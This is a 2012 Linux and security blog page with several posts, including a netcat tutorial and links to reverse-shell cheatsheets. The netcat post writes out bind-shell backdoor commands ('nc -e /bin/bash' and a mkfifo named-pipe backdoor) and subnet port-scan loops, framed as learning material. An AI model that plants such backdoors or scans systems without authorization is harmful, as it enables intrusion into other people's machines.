Sunday, 28 October 2012

Think Like A Hacker For Better Security Awareness

52% of businesses experienced more malware infections as a result of employees on social media. This whitepaper provides an insight on how to think like a hacker for better security awareness.

Security awareness is mostly about common sense, and thinking like the hackers to understand what security weaknesses they look for. But like other security precautions, it's easy to let down your guard.





Security awareness education can arm your staff with the skills to practice safe Internet usage - to reduce malware and other cyber threats. The whitepaper entitled Takes One to Know One: Think Like a Hacker for Better Security Awareness is a must read for making yourself aware of security in this digital world.

In this paper, find out:

  • Best ways to deliver a security awareness program
  • What you should teach your staff
  • How to make security awareness a priority


Download The Whitepaper




Read more...

Saturday, 27 October 2012

Steam for Linux Beta Survey Is Out

Lately, Valve Software, the vendor for steam has been showing lots of interest to develop games for linux platforms and offer linux users one of the best gaming experiences. Valve has today announced its survey for steam for linux beta.

Valve Software writes: We're looking for Linux gamers to install and test our new Steam for Linux client. We are primarily interested in experienced Linux users.



In order to take the survey, you need to first login with your Steam account to link your response with your Steam ID. Once you are ready for beta testing, you can login from this link. 1000 steam users will be chosen based upon the responses in the survey.

Steam community recently got its dedicated linux section and good for us, all these signs seem to indicate that Valve is trying to extend its market over the linux platform.


Read more...

Accelerate Your Softwares Update Speed Using Apt-fast

Long ago, I had posted about apt-fast script which used axel to create multiple HTTP connections and increase the download speed of software updates and packages. In this post, you will get the details for installing apt-fast from PPA. apt-fast is a shellscript wrapper for apt-get and aptitude that can drastically improve apt download times by downloading packages in parallel, with multiple connections per package.

As a pre-requisite, we will first install axel, a simple yet very useful command line download accelerator. Alternatively, you can also use aria accelerator with apt-fast.

samar@samar-Techgaun:~$ sudo apt-get install axel


Then you will have to add a PPA for apt-fast, update the database, and install apt-fast.

samar@samar-Techgaun:~$ sudo add-apt-repository ppa:apt-fast/stable
samar@samar-Techgaun:~$ sudo apt-get update
samar@samar-Techgaun:~$ sudo apt-get install apt-fast


You need to configure few options afterwards as below:







For manual installation and grabbing the source code, check the GitHub.

Once you install apt-fast, you can install softwares and perform updates from the repos using the command below:

samar@samar-Techgaun:~$ sudo apt-fast install package_name


I hope this becomes useful :)


Read more...

Linux Cat Command Examples

Wednesday, 24 October 2012

Happy Vijaya Dashami 2069

Techgaun team would like to wish all our site visitors happy vijaya dashami 2069. May this dashain bring peace and prosperity in everyone's life and may the world be more peaceful place than ever.

I would like to include blessings (ashirbad / आशिर्वाद) offered during Dashain.

The mantra below is enchanted when elders offer tika to male member:

आयुर द्रोण सुते श्रेयम दशरथे , सत्रुक क्षेयम रघवे, ऐश्र्वर्यम नहुशे , गतिस्च पवने, मानन्च दुर्योधने, सौर्यम शान्त नवे, बलम हलधरे , सत्यस्च कुन्तीसुते , बिज्ञ।न बिदुरे, भवन्तु भबताम, किर्तिस्च नारायणे!

Ayur Drona sute sriyem Dasarathe, Satruk ksheyam Raghave, Yaishoryem Nahushe, Gatischa pawane, Manancha Duryodhane, Suaryam Shanta nave, Balam Haldhare, Satyaschha Kuntisute, Bigyanam Bidure, Bhawanu Bhabatam, Kirtischha Narayane!

The mantra below is enchanted when the tika is offered to the female members:

ॐ जयन्ती मङ्गला काली भद्रकाली कपालिनी । दुर्गा क्ष्यमा शिवा धात्री स्वहा स्वधा नमोस्तु ते ।।

Om Jayanti Mangala Kaali Bhadra Kali Kapalini Durga Kshyama shiva dhatri swaha swadha namostu te

Happy Vijaya Dashami 2069




Read more...

Monday, 22 October 2012

Reverse Shell Backdoor Cheatsheets Collection

Once you find your way to command execution after exploiting any of the flaws in web-apps, you look for interactive shell. You can do so by binding shell in some port or using reverse shell backdoor. Here are few links with awesome backdoor cheatsheet collections for obtaining reverse shell using different scripting languages:

PentestMonkey's Cheatsheet

Bernardo's Reverse Shells One-liners

GNU Citizen

In case you can't access pentest monkey, below is the cheatsheet in PNG format:




Read more...

Ubuntu Tweak Development Will Continue

Three days ago, Ubuntu Tweak developer Tualatrix had posted a blog post mentioning that the Ubuntu Tweak will no longer be developed but he has now changed his mind and has decided to continue the development because of support he received.

The developer writes
You made me know that Ubuntu Tweak is still valuable, and as the first software project I made 5 years ago, it is just like my baby, I don’t really want to give up the development.

and thanks all the good people who left the message for him and forked the app in github.

The blog post also mentions
Back to 5 years ago, I developed it just because of my practice on Linux programming, I felt freedom when I make things on Linux (Although I didn’t have developing experience on Windows and Mac then). But now I don’t feel any freedom about developing this software any more. The initial motivation is changed, and I’m still looking for new motivation.

Overall, he is not too satisfied with his current overload for working on this personal project while still managing time for his job and personal life.

Anyway, Ubuntu Tweak 0.8.1 is out and you can download from PPA.

PPA DEB link

Release Notes


Read more...

Ninja Fu With Netcat - Hacker's Swiss Army Knife

Netcat is one of my favorite tools for network investigations and backdoor planting. Netcat is a seemingly simple but very powerful and useful tool to read and write network connections using TCP or UDP. In this post, we will see several examples of using netcat in different scenarios.

First of all, if you are using distros like Ubuntu, they are probably including the OpenBSD netcat which does not provide a very useful switch that lets us execute any command. The netcat-traditional offers this switch so for learning purpose, you should install the netcat-traditional package by issuing the command below in Ubuntu & its derivatives (However, beware of inherent risk with this feature of the traditional netcat):

samar@samar-Techgaun:~$ sudo apt-get install netcat-traditional


Now you can use both OpenBSD and traditional versions by using nc.openbsd and nc.traditional respectively. However, the nc command might still be symbolically linked with nc.openbsd (/etc/alternatives/nc). If you want to permanently use nc to refer nc.traditional, type the following command (or do sudo rm /bin/nc && sudo ln -s /bin/nc.traditional /bin/nc):

samar@samar-Techgaun:~$ sudo update-alternatives --config nc


As I had already said, netcat is a very useful tool for network related works and hence often referred as Hacker's Swiss Army Knife and TCP/IP Swiss Army Knife. You can use netcat for several purposes such as file transfer, port scanning, listen server, bind & reverse shells, backdoors, etc. Because of this, netcat has been a favorite tool for hackers to get and maintain access to the servers.

Before beginning with the examples, I would like to inform you that most of the times ports above 1024 are used to create listen servers with netcat. This is because ports below 1024 are reserved by OS for core network services and you can not bind to these ports without special privilege to the system.

Simple Netcat Listen Server


samar@samar-Techgaun:~$ nc -lvp 1234
listening on [any] 1234 ...


Simple Netcat Client


samar@samar-Techgaun:~$ nc -vvn 192.168.1.6 1234
(UNKNOWN) [192.168.1.6] 1234 (?) open


Once the client gets connected, the netcat listener might then look like this:

samar@samar-Techgaun:~$ nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.1.6] from samar-Techgaun.local [192.168.1.6] 38700


Noticed the port 38700 in the end? This is the port that the client uses to talk with the server. Observe that the value is much higher than 1024 and hence such ports are known as ephemeral port.

Once the client and server get connected, you can write anything and press ENTER. The data will get transmitted to the other end thus making netcat a data transfer tool.

Open Raw Connection With Netcat as client


samar@samar-Techgaun:~$ nc -vv ku.edu.np 80
Warning: inverse host lookup failed for 116.90.239.5: Unknown host
ku.edu.np [116.90.239.5] 80 (http) open
HEAD / HTTP/1.0\n\n

HTTP/1.1 200 OK
Date: Mon, 22 Oct 2012 04:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8

sent 21, rcvd 171


As seen above, I opened the RAW connection to ku.edu.np and then issued HEAD / HTTP/1.0\n\n request to obtain the HTTP header. You can also notice (see web server version & PHP version?) that netcat can be used for basic fingerprinting and banner grabbing. Of course, this is not limited to HTTP fingerprinting. Extend the idea to work with other services.

Web Server Example Using Netcat


samar@samar-Techgaun:~/Desktop/test$ { echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c < my_file)\r\n\r\n"; cat my_file; } | nc -lv -p 8080
listening on [any] 8080 ...


This example taken from Wiki entry works as a one shot webserver hosting the my_file's content which can be accessed through web browser by specifying http://server:8080.

File Transfer Using Netcat


To transfer file from server to client, set up the server as below:

samar@samar-Techgaun:~$ cat my_file
I am DATA
samar@samar-Techgaun:~$ nc -lvp 1234 < my_file
listening on [any] 1234 ...


In the client end, do:

samar@samar-Techgaun:~$ nc -vv 192.168.1.6 1234 > output.txt
samar-Techgaun.local [192.168.1.6] 1234 (?) open
^C sent 0, rcvd 10
samar@samar-Techgaun:~$ cat output.txt
I am DATA


Port Scanning With Netcat


samar@samar-Techgaun:~$ nc -nvz -w1 192.168.1.1 1-1024
(UNKNOWN) [192.168.1.1] 80 (http) open
(UNKNOWN) [192.168.1.1] 23 (telnet) open
(UNKNOWN) [192.168.1.1] 21 (ftp) open


If you wish to scan number of hosts (or full network), you can do something like below:

samar@samar-Techgaun:~/Desktop/test$ for ip in $(seq 1 254); do nc -nvz -w1 192.168.1.$ip 1-1024; done


In the first example, ports 1-1024 are scanned in the host 192.168.1.1 and in the second example, a class C network 192.168.1.0/24 is scanned. However, netcat is by no means an advanced port scanner and tools such as nmap are great for this job.

Spawn a process


The -e switch can be specified to spawn a process in the system. In the server, type the command below:

samar@samar-Techgaun:~$ nc -lv -p 1234 -e /bin/bash
listening on [any] 1234 ...


At the other end, you will just connect to the just started netcat service and then issue any command that the bash recognizes. Good for shells in the servers, isn't it?

samar@samar-Techgaun:~$ nc -vv 192.168.1.6 1234
samar-Techgaun.local [192.168.1.6] 1234 (?) open
ls
my_file
output.txt


Netcat backdoor using mkfifo


Since the normal pipe (|) is not so reliable & works in a unidirectional fashion, linux offers something called named pipes which can be exploited to create advanced backdoor in the systems which might not consist the netcat with -e support.

samar@samar-Techgaun:~$ mkfifo /tmp/b4ck; sh /tmp/b4ck | nc -lvp 1234 > /tmp/b4ck
listening on [any] 1234 ...


At the other end, you just need to connect to the newly created netcat service port:

samar@samar-Techgaun:~$ nc -vv 192.168.1.6 1234
localhost [192.168.1.6] 1234 (?) open
ls
my_file
output.txt
sent 3, rcvd 33


I hope this post provides some directions on how to work with netcat and proves that netcat is called TCP/IP swiss army knife for the reason. There are other several possibilities with netcat. Explore to get more out of this awesome tool. ;)


Read more...